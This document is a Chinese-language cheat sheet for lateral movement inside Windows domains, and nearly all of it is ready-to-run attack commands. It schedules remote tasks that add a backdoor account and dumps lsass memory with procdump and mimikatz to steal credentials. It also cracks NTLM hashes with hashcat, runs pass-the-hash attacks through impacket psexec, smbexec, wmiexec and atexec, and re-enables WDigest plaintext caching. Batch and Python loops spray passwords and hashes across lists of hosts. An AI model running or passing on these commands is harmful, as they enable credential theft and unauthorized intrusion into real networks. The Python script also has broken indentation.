域横向 at schtasks smb wmi

#加密方式

windows系统LM hash及NTLM hash加密算法，个人系统在windows vista后，服务器系统在windows 2003以后，认证方式均为NTLM Hash。

#at&schtasks
##at

at < windows2012

建立ipc$

复制文件到目标机C盘：copy add.bat \\ip\c$

添加计划任务：at \ip 时间(00:00) c:\add.bat

#添加用户
add.bat > "net user ceshi 12345 /add"

##schtasks

schtasks >= Windows2012

建立ipc$

复制文件到目标机C盘：copy add.bat \\ip\c$

创建adduser任务对应执行文件：schtasks /create /s ip /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat

运行adduser任务：schtasks /run /s ip /tn adduser /i

删除adduser任务：schtasks /delete /s ip /tn adduser /f

##Hash工具：atexec-impacket

atexec.exe ./username:password@ip "whoami"

atexec.exe domain/username:password@ip "whoami"

atexec.exe -hashes :hash ./username@ip "whoami"

smb&wmi

##psexec&smbexec

# Windows2012以上版本默认关闭wdigest，无法从内存中获取明文密码
# Windows2012一下版本安装KB2871997补丁，无法从内存中获取明文密码

解决方法：
1. 利用hash传递（pth,ptk等）进行移动

2. 利用其他服务协议（smb,wmi等）进行hash移动

3. 利用注册表操作开启wdigest auth值进行获取
HKLM\SYSTEM\CurrentControlSet \Control\SecurityProviders\WDigest /v \ UseLogonCredential /t REG_DWORD /d 1 /f

4. 利用工具或第三方平台（hachcat）进行破解获取

##Procdump(官方自带)+Mimikatz配合获取

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz上执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
#Pwdump7
#QuarksPwdump

##Hashcat破解获取Windows NTML Hash

hashcat -a 0 -m 1000 hash file --force

##SMB服务利用-psexec,smbexec（官方自带）

利用sMB服务可以通过明文或hash传递来远程执行，条件445服务端口开放。

#psexec第一种：先有ipc链接，psexec需要明文或hash传递
net use \\192.168.3.32\ipc$ "password" /user:username
psexec \\192.168.3.32 -s cmd
#需要先有ipc链接 -s以system权限运行

#psexec第二种:不 用建立IPC直接提供明文账户密码
psexec \192.168.3.21 -u username -p password -s cmd
psexec -hashes :$HASH$ ./username@ip
psexec -hashes :$HASH$ domain/username@ip
psexec -hashes :hash ./username@ip # 官方pstools无法采用hash连接

#非官方自带-参考impacket工具包使用,操作简单,容易被杀

#smbexec无需先ipc链接明文或nash传递

smbexec domain/username:password@ip
smbexec ./username:password@ip
smbexec -hashes :$HASH$ ./username@ip
smbbexec -hashes :$HASH$ domain/ username@ip
smbexec -hashes :hash ./username@ip
smbexec -hashes :hash domain/username@ip

##WMI服务利用-cscript,wmie xec,wmic

#WMI (windows Management Instrumentation)是通过135端口进行利用，支持用户名明文或者hash的方式进行认证，并且该方法不会在目标日志系统留下痕迹。

#自带wMIc明文传递无回显
wmic /node:ip /user:username /password:password process call create " cmd.exe /c ipconfig >C:\1.txt"

#自带cscript明文传递有回显
cscript //nologo wmiexec.vbs /shell ip username password

#套件impacket wmiexec 明文或hash传递 有回显exe版本
wmiexec ./username:password@ip "whoami"
wmiexec domain/username:password@ip "whoami"
wmiexec -hashes :hash ./username@ip "whoami"
wmiexec -hashes :hash domain/username@ip "whoami"

CMD脚本批量利用

批量检测IP对应明文连接：
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "password" /user:username

批量检测IP对应明文回显版:
FOR /F %%i in (ips.txt) do atexec.exe ./username:password@%%i whoami

批量检测明文对应IP回显版:
FOR /F %%i in (pass.txt) do atexec.exe ./username:%%i@ip whoami

批量检测Hash对应IP回显版:
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./username@ip whoami

Python脚本批量利用

#生成exe：pyinstaller -F 1.py

import os,time
ips={
'192.168.3.21',
'192.168.3.32'
}
users={
'Administrator',
'webadmin'
}
hashs={
'ccef208c6485269c20db2cad21734fe7',
'518b98ad4178a53695dc997aa02d455c'
}
for ip in ips:
for user in users:
    for mimahash in hashs:
    exec = "wmiexec -hashes :"+mimaHash+" god/"+user+"@"+ip+" whoami"
    exec1 = "wmiexec -hashes :"+mimaHash+" ./"+user+"@"+ip+" whoami"
    print('--->' + exec + '<---')
    print('--->' + exec1 + '<---')
    os.system(exec)
    os.system(exec1)
    time.sleep(0.5)

工具优缺点

1. 通过官方PSTools中psexec连接时只能用明文密码进行连接，但是不会被杀毒软件拦截
2. 通过官方自带命令WMIC时，只支持明文且没有回显需自己读取
3. 通过官方自带命令cscript与wmiexec.vbs配合时有回显，但是只支持明文
4. 通过非官方impacket-examples-windows中psexec和smbexec和wmiexec连接时可支持密文hash密码连接，但容易被杀毒软件拦截
5. 现在基本通过mimikatz获取的密码都是密文的

资源工具

https://lgithub.com/hashcat/hashcat
https://www.freebuf.com/sectool/164507.html
https://github.com/gentilkiwi/mimikatz/releases
https://github.com/SecureAuthCorp/impacket
https://gitee.com/RichChigga/impacket-examples-windows
https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

思路

收集密码，hash

探活ip

收集域用户